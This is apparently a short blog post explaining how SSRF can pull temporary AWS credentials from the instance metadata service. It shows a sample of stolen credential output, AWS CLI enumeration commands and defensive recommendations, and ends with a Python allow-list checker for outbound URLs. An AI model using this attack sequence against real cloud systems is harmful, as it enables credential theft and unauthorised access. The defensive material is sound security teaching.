Stealing AWS Credentials via SSRF in Metadata API
- Trung Le

- Jul 26
🔴 Attacker discovers a web app vulnerable to Server-Side Request Forgery (SSRF) on a cloud-based server.
Exploit Payload
Phase 2 – Privilege Escalation
🔴 Extracts temporary AWS credentials.
Stolen Output.
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "xYi...",
  "Token": "Fwo...",
  "Expiration": "2025-07-30T12:34:56Z"
}
Phase 3 – Exploitation
🔴 Uses the AWS CLI to enumerate S3 buckets and EC2 keys.
aws s3 ls
aws ec2 describe-instances --region us-east-1
Weaknesses Exploited
🔴 No SSRF protection
🔴 Open access to metadata service
🔴 Over-permissive IAM role
Defensive Recommendations
🔴 Enforce SSRF protection using allow-lists or proxies
🔴 Upgrade to IMDSv2 for EC2
🔴 Apply least privilege to IAM roles
🔴 Monitor API activity using CloudTrail
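
One way to implement the allow-list recommendation is sketched below. It is an added example, not code from the original post. The host names in ALLOWED_HOSTS, the function names and the injectable resolve parameter are assumptions made for illustration. The check also inspects the resolved addresses, so an allow-listed name that points at the metadata address 169.254.169.254 is still refused.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: the only hosts this hypothetical app may fetch from.
ALLOWED_HOSTS = {"images.example.com", "api.example.com"}
ALLOWED_SCHEMES = {"https"}


def is_internal(ip):
    """True for addresses an outbound fetch must never reach."""
    # ::ffff:169.254.169.254 is the metadata address in IPv6 form.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_outbound_url(url, resolve=socket.getaddrinfo):
    """Return (allowed, reason) for a user-supplied URL.

    `resolve` is injectable so the check can be tested offline.
    """
    try:
        parts = urlsplit(url)
        port = parts.port or 443
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    try:
        infos = resolve(host, port, proto=socket.IPPROTO_TCP)
    except OSError:
        return False, "resolution failed"
    addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    # Reject if ANY record is internal: a poisoned or rebinding DNS
    # answer for an allow-listed name must not reach 169.254.169.254.
    if not addrs or any(is_internal(a) for a in addrs):
        return False, "resolves to internal address"
    return True, "ok"
```

Validation alone leaves a gap between check and fetch: the HTTP client should connect to the address that was validated and run every redirect target through the same check.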

